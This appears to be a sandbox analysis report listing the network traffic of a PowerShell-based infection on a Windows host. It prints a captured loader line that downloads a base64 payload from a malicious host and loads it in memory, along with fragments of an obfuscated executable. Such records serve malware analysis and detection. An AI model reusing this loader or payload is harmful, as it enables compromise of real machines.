a0 88 52 90 05 00 14 a0 60 01 d0 ff d9 00 2d 03 d8 0f 8a 44 80 19 ce 28 bc 17 62 15 bf 2d 63 [TRUNCATED] Data Ascii: MSCF,O2Wqh disallowedcert.stl^KCKwTS:wK'C0TBh{C)Y@()R"ED^6u\|f~3o3 SPKko#"{-UP:aPr@dDyh):!/\AA<I_<$qh'7H@`TKS%Y4R`-D(b-c"G=dxS+2aEdL77Jc[@iT&^78gNW6EkFYF.cNtORD kJyzd;9_t]@yw}xdt`f\K;\|hX4/;xTq>0<3XL$&,b\V\GO@H3tJ)x?{[G>7<^QzGw9Pdi]n%K}z2PyAsz@44Yd_Z5sflC#K{9^EkzMaG(5g }t#4$;,S@fsku ^2#_
Sep 30, 2024 18:58:19.724239111 CEST	224	IN	Data Raw: ba b2 f2 49 18 c8 0d 88 1a e7 07 d9 ab 3b f6 99 1e 13 e8 b2 e9 d5 77 b9 d9 50 09 13 90 55 43 59 0a 8d f4 24 3b b2 53 b5 5f 7c d3 78 f9 00 64 4b e3 ed ee 5b 69 12 86 71 1b ec 5e 05 6c b4 e7 41 c6 3f 93 c0 ec 89 b9 a9 9c 27 4e a0 a8 20 b6 4c 81 6c Data Ascii: I;wPUCY$;S_\|xdK[iq^lA?'N Llm*+f#]A;.ZrItRWKr1e=8=z:OizdrC_o]jN;s3@3dgrv,#`b [r(h;:-S>d
Sep 30, 2024 18:58:19.724248886 CEST	1236	IN	Data Raw: d3 51 79 95 39 b5 c8 f6 0a af d4 9d 33 43 20 d3 0d 42 cc 84 38 3d 0d af a3 57 c8 fb 56 75 5d 08 64 3d b5 c2 6d b5 0c 1f 0c b8 4b 8e f3 55 46 0d af 82 ec fb e6 a0 ca 2d fb cf 7a f3 e2 5b 74 a2 56 3e 46 20 1b 7b 52 74 e5 58 ac 45 8a 95 c8 94 68 e0 Data Ascii: Qy93C B8=WVu]d=mKUF-z[tV>F {RtXEh^C!negNrU=5;N G%rn2)6KEuBt K$y6@=4;vgp}QwtAF\|QO@Wnt~a6^v{
Sep 30, 2024 18:58:19.724260092 CEST	1236	IN	Data Raw: b3 de 2a bd 9e d2 8f 3a d6 7a 8d c6 88 93 0b 5c 02 c1 ad 32 a8 6e aa ef 98 da 0e 6f 1f b2 a8 9a a4 63 eb b0 0b 12 46 fa 30 32 28 04 7a 8b 08 0d 26 8d 88 3f c0 46 1a 60 1e 61 38 fd 5f 36 66 d4 00 0f 88 e9 e1 ec 70 d6 2d c1 51 ca 47 0a 6d b6 07 0e Data Ascii: *:z\2nocF02(z&?F`a8_6fp-QGm_O`6\h$8O,'_'O;/G~oG(YZ{@IJ{9`sgt]o%_OiMK;q2n ;;dH=#
Sep 30, 2024 18:58:19.724272013 CEST	448	IN	Data Raw: 21 7a a9 e1 da 4d 91 a9 ea eb df 0c a6 d5 f8 63 5c a7 56 d0 9f 24 0a 28 ef 2e 5f d9 2d 63 30 52 4f dc 78 96 a0 7e 36 41 cb 3e d7 ac 25 2f f2 09 73 f8 9b a1 fc fd d6 2e d6 a6 c8 ac 01 d3 9c 99 59 4f d3 19 27 9b f5 49 c9 9b 85 c6 6d 58 09 36 c7 de Data Ascii: !zMc\V$(._-c0ROx~6A>%/s.YO'ImX6?&L *G]23so~J8$M2SQN!YeVG55O/&-\3_S$U3]Hj'E"'![E\C!
Sep 30, 2024 18:58:19.724430084 CEST	448	IN	Data Raw: 21 7a a9 e1 da 4d 91 a9 ea eb df 0c a6 d5 f8 63 5c a7 56 d0 9f 24 0a 28 ef 2e 5f d9 2d 63 30 52 4f dc 78 96 a0 7e 36 41 cb 3e d7 ac 25 2f f2 09 73 f8 9b a1 fc fd d6 2e d6 a6 c8 ac 01 d3 9c 99 59 4f d3 19 27 9b f5 49 c9 9b 85 c6 6d 58 09 36 c7 de Data Ascii: !zMc\V$(._-c0ROx~6A>%/s.YO'ImX6?&L *G]23so~J8$M2SQN!YeVG55O/&-\3_S$U3]Hj'E"'![E\C!
Sep 30, 2024 18:58:19.724828005 CEST	817	IN	Data Raw: da cd b5 9a 9b 78 5d d9 cd bf 6b 5e 6e 4c 75 d2 82 ba 74 a8 f9 5e 65 07 15 7e 56 ab 53 76 4d 78 91 96 d6 84 39 73 2d 81 95 eb e5 8c c0 1b f9 17 15 c5 72 56 42 e2 70 38 0e f7 9e 7b 4a 13 08 26 70 a7 5c 6e dd 51 dd 29 07 3c 6e d5 ba 13 74 14 2d e5 Data Ascii: x]k^nLut^e~VSvMx9s-rVBp8{J&p\nQ)<nt-PU2]b6/7OKJwO~o$0jnF`1.X?\7X\|,tCpEEENx=344dv`?{b0b"/_Q+gNte*a^g

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49708	188.114.97.3	80	6588	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 18:58:24.903947115 CEST	197	OUT	GET //78/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: ministryofficedownloadcloudserver.screenpont.xyz Connection: Keep-Alive
Sep 30, 2024 18:58:25.237471104 CEST	912	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 30 Sep 2024 16:58:25 GMT Content-Type: text/html Content-Length: 167 Connection: keep-alive Cache-Control: max-age=3600 Expires: Mon, 30 Sep 2024 17:58:25 GMT Location: https://ministryofficedownloadcloudserver.screenpont.xyz//78/ Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O0jcxhrAcoaFhzyCbIjXZ5%2BwIHM5Ak6OBDxxzineTQjve2IVFhst3DsOHcenTq6f4Eme3WpLtC9jnGCydX%2Bd4LFGCUcHCYETGC4TAUSMZ%2BdOJu3D0pyTiRotIKXSAerdwdBYe9hwZz7H0UABQtCwQAUEP6non9bL6LIzjrIc7NP1t6E%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Speculation-Rules: "/cdn-cgi/speculation" Server: cloudflare CF-RAY: 8cb5c1f349df4234-EWR Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49720	188.114.97.3	80	7656	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 18:58:28.957549095 CEST	200	OUT	GET /78/CKP/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: ministryofficedownloadcloudserver.screenpont.xyz Connection: Keep-Alive
Sep 30, 2024 18:58:29.452848911 CEST	951	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 30 Sep 2024 16:58:29 GMT Content-Type: text/html Content-Length: 167 Connection: keep-alive Cache-Control: max-age=3600 Expires: Mon, 30 Sep 2024 17:58:29 GMT Location: https://ministryofficedownloadcloudserver.screenpont.xyz/78/CKP/ Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bQ0o97r4mY7vY3SJ0HXy0VVEijWpNXubYweP%2FV6ILXCWBmWRrUuE%2BLmVl1UoK8f0sLPqwxZLvq9IiqK410Dhd1hFJ1z0WJRIgcoP9jBQmz5OAWcyTGvGd%2BUSnfxRoWNsf2U%2BwJY5UerX4l5ndLYKp2shRpMm%2BHTGYE48n%2By8XlXxfDg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Speculation-Rules: "/cdn-cgi/speculation" Server: cloudflare CF-RAY: 8cb5c20d9fa17298-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

HTTPS Connections

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Sep 30, 2024 18:58:27.119904995 CEST	203.101.184.118	443	192.168.2.8	49713	CN=pakistan.gov.pk CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=GoGetSSL RSA DV CA, O=GoGetSSL, L=Riga, C=LV CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=GoGetSSL RSA DV CA, O=GoGetSSL, L=Riga, C=LV CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Fri May 03 02:00:00 CEST 2024 Tue Mar 12 01:00:00 CET 2019 Thu Sep 06 02:00:00 CEST 2018 Thu Jan 01 01:00:00 CET 2004	Thu Oct 03 01:59:59 CEST 2024 Mon Jan 01 00:59:59 CET 2029 Wed Sep 06 01:59:59 CEST 2028 Mon Jan 01 00:59:59 CET 2029	771,4865-4866-4867-49195-49199-49196-49200-52393-52392-49171-49172-156-157-47-53,11-45-65037-43-65281-10-27-23-13-17513-51-16-18-5-35-0-21,29-23-24,0	142a7ae0d522cf014cb818fbbff68a84
					CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US	CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Tue Mar 12 01:00:00 CET 2019	Mon Jan 01 00:59:59 CET 2029
					CN=GoGetSSL RSA DV CA, O=GoGetSSL, L=Riga, C=LV	CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US	Thu Sep 06 02:00:00 CEST 2018	Wed Sep 06 01:59:59 CEST 2028
					CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Thu Jan 01 01:00:00 CET 2004	Mon Jan 01 00:59:59 CET 2029

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49712	188.114.97.3	443	6588	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 16:58:25 UTC	197	OUT	GET //78/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: ministryofficedownloadcloudserver.screenpont.xyz Connection: Keep-Alive
2024-09-30 16:58:26 UTC	882	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 16:58:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: LAST_VISIT=Monday%2C%20September%2030%2C%202024%20at%2010%3A28%20PM; expires=Tue, 30-Sep-2025 16:58:26 GMT; Max-Age=31536000 Set-Cookie: VISIT_NUMBER=1; expires=Mon, 14-Oct-2024 16:58:26 GMT; Max-Age=1209600 Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sW3aauN1zS5kqnGBBQYuv6IeLMI6wOHHa9oYQ65PrcPuJWV7vOZFUHsai%2B1piCDHIzx%2FkP4QhA%2B8aU%2FiOFWqK4wDdYcnwAt2uUXPtOP3bcGu05voy74PRfU%2BGXapsHgnYaQyPKiDUYuunuew7HpReTHIJENUEzdnIkIMFHvmEYtJ%2FFk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Speculation-Rules: "/cdn-cgi/speculation" Server: cloudflare CF-RAY: 8cb5c1f7de450f53-EWR
2024-09-30 16:58:26 UTC	263	IN	Data Raw: 31 30 30 0d 0a 24 73 74 72 69 6e 67 20 3d 20 69 72 6d 20 20 28 27 68 74 74 70 3a 2f 2f 6d 69 6e 69 73 74 72 79 6f 66 66 69 63 65 64 6f 77 6e 6c 6f 61 64 63 6c 6f 75 64 73 65 72 76 65 72 2e 73 63 72 65 65 6e 70 6f 6e 74 2e 78 79 7a 2f 37 38 2f 43 4b 50 2f 27 29 3b 20 24 62 79 74 65 65 73 20 3d 20 5b 53 79 73 74 65 6d 2e 43 6f 6e 76 65 72 74 5d 3a 3a 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 28 24 73 74 72 69 6e 67 2e 52 65 70 6c 61 63 65 28 27 24 27 2c 27 27 29 29 3b 20 5b 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 41 73 73 65 6d 62 6c 79 5d 3a 3a 4c 6f 61 64 28 24 62 79 74 65 65 73 29 3b 24 41 64 6f 62 65 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 44 53 43 2e 53 69 67 6e 3b 20 24 41 64 6f 62 65 2e 43 6f 6e 6e 65 63 74 28 27 43 68 65 63 6b Data Ascii: 100$string = irm ('http://ministryofficedownloadcloudserver.screenpont.xyz/78/CKP/'); $bytees = [System.Convert]::FromBase64String($string.Replace('$','')); [System.Reflection.Assembly]::Load($bytees);$Adobe = New-Object DSC.Sign; $Adobe.Connect('Check
2024-09-30 16:58:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49722	188.114.97.3	443	7656	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 16:58:29 UTC	200	OUT	GET /78/CKP/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: ministryofficedownloadcloudserver.screenpont.xyz Connection: Keep-Alive
2024-09-30 16:58:30 UTC	660	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 16:58:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fzT%2FZANs2QKMgQYcQxKb8Km6OMGC%2BNrbkmvoheIQhAGdpCOQEPhFRHc0IN6V38tSDjKDFmjMkdYkdBDJOkbeyy%2FuNOHl706dN9dQEcW3ZgsTTAW5BqOtiV%2BwfwI49JGTz3HAAJ%2FkFUguVCWIswGNS8QpmEGcNkA3lUKz2fAnSxT%2BLmc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Speculation-Rules: "/cdn-cgi/speculation" Server: cloudflare CF-RAY: 8cb5c211bd548cc6-EWR
2024-09-30 16:58:30 UTC	709	IN	Data Raw: 37 64 30 61 0d 0a 54 56 71 51 41 24 41 4d 41 41 41 24 41 45 41 41 41 24 41 2f 2f 38 41 24 41 4c 67 41 41 24 41 41 41 41 41 24 41 41 51 41 41 24 41 41 41 41 41 24 41 41 41 41 41 24 41 41 41 41 41 24 41 41 41 41 41 24 41 41 41 41 41 24 41 41 41 41 41 24 41 41 41 41 41 24 41 41 41 41 41 24 41 41 41 41 41 24 67 41 41 41 41 24 41 34 66 75 67 24 34 41 74 41 6e 24 4e 49 62 67 42 24 54 4d 30 68 56 24 47 68 70 63 79 24 42 77 63 6d 39 24 6e 63 6d 46 74 24 49 47 4e 68 62 24 6d 35 76 64 43 24 42 69 5a 53 42 24 79 64 57 34 67 24 61 57 34 67 52 24 45 39 54 49 47 24 31 76 5a 47 55 24 75 44 51 30 4b 24 4a 41 41 41 41 24 41 41 41 41 41 24 42 51 52 51 41 24 41 54 41 45 44 24 41 4d 70 77 68 24 6d 59 41 41 41 24 41 41 41 41 41 24 41 41 4f 41 41 24 44 69 45 4c 41 24 54 41 41 Data Ascii: 7d0aTVqQA$AMAAA$AEAAA$A//8A$ALgAA$AAAAA$AAQAA$AAAAA$AAAAA$AAAAA$AAAAA$AAAAA$AAAAA$AAAAA$AAAAA$AAAAA$gAAAA$A4fug$4AtAn$NIbgB$TM0hV$Ghpcy$Bwcm9$ncmFt$IGNhb$m5vdC$BiZSB$ydW4g$aW4gR$E9TIG$1vZGU$uDQ0K$JAAAA$AAAAA$BQRQA$ATAED$AMpwh$mYAAA$AAAAA$AAOAA$DiELA$TAA
2024-09-30 16:58:30 UTC	1369	IN	Data Raw: 41 41 41 41 24 41 41 41 41 41 24 41 41 41 41 41 24 41 41 42 41 41 24 41 42 41 4c 6e 24 4a 6c 62 47 39 24 6a 41 41 41 4d 24 41 41 41 41 41 24 4b 41 49 41 41 24 41 43 41 41 41 24 41 56 67 67 41 24 41 41 41 41 41 24 41 41 41 41 41 24 41 41 41 41 41 24 41 51 41 41 41 24 51 67 41 41 41 24 41 41 41 41 41 24 41 41 41 41 41 24 41 41 41 41 41 24 41 41 43 51 62 24 67 67 41 41 41 24 41 41 41 45 67 24 41 41 41 41 43 24 41 41 55 41 69 24 4d 38 46 41 43 24 77 38 41 67 41 24 42 41 41 41 41 24 41 41 41 41 41 24 4c 51 4c 43 41 24 44 36 58 77 41 24 41 6c 6d 30 49 24 41 49 41 41 41 24 41 41 41 41 41 24 41 41 41 41 41 24 41 41 41 41 41 24 41 41 41 41 41 24 41 41 41 41 41 24 41 41 41 41 41 24 41 41 41 41 41 24 41 41 41 41 41 24 41 41 41 41 42 24 4d 77 41 77 44 24 4d 41 41 41 Data Ascii: AAAA$AAAAA$AAAAA$AABAA$ABALn$JlbG9$jAAAM$AAAAA$KAIAA$ACAAA$AVggA$AAAAA$AAAAA$AAAAA$AQAAA$QgAAA$AAAAA$AAAAA$AAAAA$AACQb$ggAAA$AAAEg$AAAAC$AAUAi$M8FAC$w8AgA$BAAAA$AAAAA$LQLCA$D6XwA$Alm0I$AIAAA$AAAAA$AAAAA$AAAAA$AAAAA$AAAAA$AAAAA$AAAAA$AAAAA$AAAAB$MwAwD$MAAA
2024-09-30 16:58:30 UTC	1369	IN	Data Raw: 41 42 69 24 55 6d 67 41 55 24 41 41 41 51 67 24 41 41 41 41 41 24 48 35 4a 41 67 24 41 45 65 77 6b 24 43 41 41 51 36 24 39 66 37 2f 2f 24 79 59 67 41 41 24 41 41 41 44 6a 24 71 2f 76 2f 2f 24 46 79 6a 6e 41 24 51 41 47 4a 53 24 61 41 41 77 41 24 41 42 43 41 44 24 41 41 41 41 66 24 6b 6b 43 41 41 24 52 37 48 67 49 24 41 42 44 72 4a 24 2f 76 2f 2f 4a 24 69 41 42 41 41 24 41 41 4f 4c 37 24 2b 2f 2f 38 41 24 4f 69 73 46 4b 24 47 77 33 4b 6c 24 34 41 4b 41 51 24 45 41 41 59 71 24 41 45 49 72 42 24 53 69 50 54 7a 24 5a 65 66 67 59 24 41 41 41 51 55 24 2f 67 45 71 41 24 41 41 41 4e 69 24 73 46 4b 41 52 24 61 52 46 6c 2b 24 42 67 41 41 42 24 43 6f 41 41 44 24 6f 72 42 53 69 24 73 35 69 35 67 24 41 43 68 57 41 24 77 41 47 4b 67 24 41 36 4b 77 55 24 6f 41 30 34 32 Data Ascii: ABi$UmgAU$AAAQg$AAAAA$H5JAg$AEewk$CAAQ6$9f7//$yYgAA$AAADj$q/v//$FyjnA$QAGJS$aAAwA$ABCAD$AAAAf$kkCAA$R7HgI$ABDrJ$/v//J$iABAA$AAOL7$+//8A$OisFK$Gw3Kl$4AKAQ$EAAYq$AEIrB$SiPTz$ZefgY$AAAQU$/gEqA$AAANi$sFKAR$aRFl+$BgAAB$CoAAD$orBSi$s5i5g$AChWA$wAGKg$A6KwU$oA042
2024-09-30 16:58:30 UTC	1369	IN	Data Raw: 45 67 24 45 43 66 53 34 24 41 41 41 51 67 24 41 41 41 41 41 24 48 35 4a 41 67 24 41 45 65 31 55 24 43 41 41 51 35 24 68 76 2f 2f 2f 24 79 59 67 41 67 24 41 41 41 44 68 24 37 2f 2f 2f 2f 24 45 67 46 38 4c 24 51 41 41 42 42 24 49 42 4b 41 45 24 41 41 43 73 67 24 41 51 41 41 41 24 48 35 4a 41 67 24 41 45 65 7a 34 24 43 41 41 51 36 24 57 66 2f 2f 2f 24 79 59 67 41 51 24 41 41 41 44 68 24 4f 2f 2f 2f 2f 24 45 67 46 2b 68 24 77 49 41 42 43 24 69 6b 43 41 41 24 47 4a 53 5a 39 24 4c 51 41 41 42 24 43 41 44 41 41 24 41 41 4f 44 48 24 2f 2f 2f 38 54 24 4d 41 51 41 45 24 77 45 41 41 41 24 4d 41 41 42 45 24 72 42 53 68 6c 24 6e 41 67 76 49 24 41 49 41 41 41 24 44 2b 44 67 41 24 41 4f 41 41 41 24 41 41 44 2b 44 24 41 41 41 52 51 24 59 41 41 41 43 24 65 41 41 41 41 24 Data Ascii: Eg$ECfS4$AAAQg$AAAAA$H5JAg$AEe1U$CAAQ5$hv///$yYgAg$AAADh$7////$EgF8L$QAABB$IBKAE$AACsg$AQAAA$H5JAg$AEez4$CAAQ6$Wf///$yYgAQ$AAADh$O////$EgF+h$wIABC$ikCAA$GJSZ9$LQAAB$CADAA$AAODH$///8T$MAQAE$wEAAA$MAABE$rBShl$nAgvI$AIAAA$D+DgA$AOAAA$AAD+D$AAARQ$YAAAC$eAAAA$
2024-09-30 16:58:30 UTC	1369	IN	Data Raw: 48 24 36 49 41 67 41 24 45 4b 4b 67 49 24 41 41 59 6c 4a 24 69 6f 53 41 42 24 38 4d 4b 43 41 24 41 41 41 5a 39 24 48 51 41 41 42 24 43 41 41 41 41 24 41 41 66 6b 6b 24 43 41 41 52 37 24 58 51 49 41 42 24 44 6f 37 2f 2f 24 2f 2f 4a 69 41 24 43 41 41 41 41 24 4f 44 44 2f 2f 24 2f 38 41 41 41 24 41 54 4d 41 51 24 41 37 67 41 41 24 41 41 59 41 41 24 42 45 72 42 53 24 68 5a 32 48 4d 24 2b 49 41 55 41 24 41 41 44 2b 44 24 67 41 41 4f 41 24 41 41 41 41 44 24 2b 44 41 41 41 24 52 51 59 41 41 24 41 41 46 41 41 24 41 41 66 77 41 24 41 41 47 73 41 24 41 41 41 79 41 24 41 41 41 57 51 24 41 41 41 4a 73 24 41 41 41 41 34 24 41 41 41 41 41 24 42 49 42 48 78 24 41 6f 49 41 41 24 41 42 6e 30 6d 24 41 41 41 45 49 24 41 45 41 41 41 24 42 2b 53 51 49 24 41 42 48 73 68 24 41 Data Ascii: H$6IAgA$EKKgI$AAYlJ$ioSAB$8MKCA$AAAZ9$HQAAB$CAAAA$AAfkk$CAAR7$XQIAB$Do7//$//JiA$CAAAA$ODD//$/8AAA$ATMAQ$A7gAA$AAYAA$BErBS$hZ2HM$+IAUA$AAD+D$gAAOA$AAAAD$+DAAA$RQYAA$AAFAA$AAfwA$AAGsA$AAAyA$AAAWQ$AAAJs$AAAA4$AAAAA$BIBHx$AoIAA$ABn0m$AAAEI$AEAAA$B+SQI$ABHsh$A
2024-09-30 16:58:30 UTC	1369	IN	Data Raw: 24 42 71 41 41 41 24 41 56 67 41 41 24 41 44 6a 63 41 24 41 41 41 63 79 24 59 41 41 41 71 24 41 50 41 41 41 24 42 43 41 41 41 24 41 41 41 66 6b 24 6b 43 41 41 52 24 37 48 51 49 41 24 42 44 6d 6b 2f 24 2f 2f 2f 4a 69 24 41 43 41 41 41 24 41 4f 4a 6e 2f 24 2f 2f 39 7a 4a 24 77 41 41 43 6f 24 41 32 41 41 41 24 45 49 41 77 41 24 41 41 41 34 68 24 66 2f 2f 2f 33 24 4d 6f 41 41 41 24 4b 67 44 30 41 24 41 41 51 67 43 24 77 41 41 41 44 24 68 78 2f 2f 2f 24 2f 63 78 59 41 24 41 41 61 41 4e 24 77 41 41 42 43 24 41 44 41 41 41 24 41 4f 46 33 2f 24 2f 2f 38 71 66 24 67 55 41 41 41 24 53 41 4f 77 41 24 41 42 43 41 46 24 41 41 41 41 66 24 6b 6b 43 41 41 24 52 37 63 51 49 24 41 42 44 6b 2b 24 2f 2f 2f 2f 4a 24 69 41 4b 41 41 24 41 41 4f 44 50 24 2f 2f 2f 38 6f 24 69 77 Data Ascii: $BqAAA$AVgAA$ADjcA$AAAcy$YAAAq$APAAA$BCAAA$AAAfk$kCAAR$7HQIA$BDmk/$///Ji$ACAAA$AOJn/$//9zJ$wAACo$A2AAA$EIAwA$AAA4h$f///3$MoAAA$KgD0A$AAQgC$wAAAD$hx///$/cxYA$AAaAN$wAABC$ADAAA$AOF3/$//8qf$gUAAA$SAOwA$ABCAF$AAAAf$kkCAA$R7cQI$ABDk+$////J$iAKAA$AAODP$///8o$iw
2024-09-30 16:58:30 UTC	1369	IN	Data Raw: 49 41 41 43 44 24 44 41 41 41 41 24 4b 49 30 41 41 24 41 59 6c 4a 6e 24 36 4c 41 67 41 24 45 4b 4c 51 49 24 41 41 59 6c 4a 24 68 4d 42 49 41 24 63 41 41 41 42 24 2b 53 51 49 41 24 42 48 74 4b 41 24 67 41 45 4f 56 24 7a 2f 2f 2f 38 24 6d 49 41 67 41 24 41 41 41 34 55 24 66 2f 2f 2f 79 24 69 52 41 41 41 24 47 4a 53 5a 2b 24 6a 77 49 41 42 24 43 6a 45 43 41 24 41 47 4a 53 59 24 54 41 79 41 46 24 41 41 41 41 66 24 6b 6b 43 41 41 24 52 37 61 67 49 24 41 42 44 6f 6f 24 2f 2f 2f 2f 4a 24 69 41 46 41 41 24 41 41 4f 42 33 24 2f 2f 2f 38 34 24 41 77 49 41 41 24 43 41 55 41 41 24 41 41 4f 41 37 24 2f 2f 2f 38 34 24 59 51 4d 41 41 24 43 41 5a 41 41 24 41 41 2f 67 34 24 43 41 44 6a 33 24 2f 76 2f 2f 66 24 6a 73 41 41 41 24 51 67 75 67 41 24 41 41 43 69 4e 24 41 41 41 Data Ascii: IAACD$DAAAA$KI0AA$AYlJn$6LAgA$EKLQI$AAYlJ$hMBIA$cAAAB$+SQIA$BHtKA$gAEOV$z///8$mIAgA$AAA4U$f///y$iRAAA$GJSZ+$jwIAB$CjECA$AGJSY$TAyAF$AAAAf$kkCAA$R7agI$ABDoo$////J$iAFAA$AAOB3$///84$AwIAA$CAUAA$AAOA7$///84$YQMAA$CAZAA$AA/g4$CADj3$/v//f$jsAAA$QgugA$AACiN$AAA
2024-09-30 16:58:30 UTC	1369	IN	Data Raw: 41 42 44 6f 24 75 2f 50 2f 2f 24 4a 69 41 47 41 24 41 41 41 4f 43 24 50 38 2f 2f 39 24 2b 4f 77 41 41 24 42 43 41 79 41 24 51 41 41 4b 49 24 30 41 41 41 59 24 6c 4a 69 44 41 24 41 41 41 41 4b 24 49 30 41 41 41 24 59 6c 4a 6e 36 24 47 41 67 41 45 24 4b 4b 41 49 41 24 41 59 6c 4a 6f 24 41 37 41 41 41 24 45 49 41 63 41 24 41 41 41 34 36 24 2f 76 2f 2f 78 24 45 41 48 78 77 24 6f 6a 67 41 41 24 42 69 68 69 41 24 41 41 47 4a 53 24 59 6d 49 41 51 24 41 41 41 41 34 24 30 50 76 2f 2f 24 79 68 68 41 41 24 41 47 4a 53 59 24 54 41 43 41 42 24 41 41 41 41 66 24 6b 6b 43 41 41 24 52 37 48 67 49 24 41 42 44 71 7a 24 2b 2f 2f 2f 4a 24 69 41 42 41 41 24 41 41 4f 4b 6a 24 37 2f 2f 38 52 24 42 42 45 42 4b 24 49 38 41 41 41 24 59 6c 4a 6d 6b 24 2f 66 76 33 2f 24 2f 79 41 53 Data Ascii: 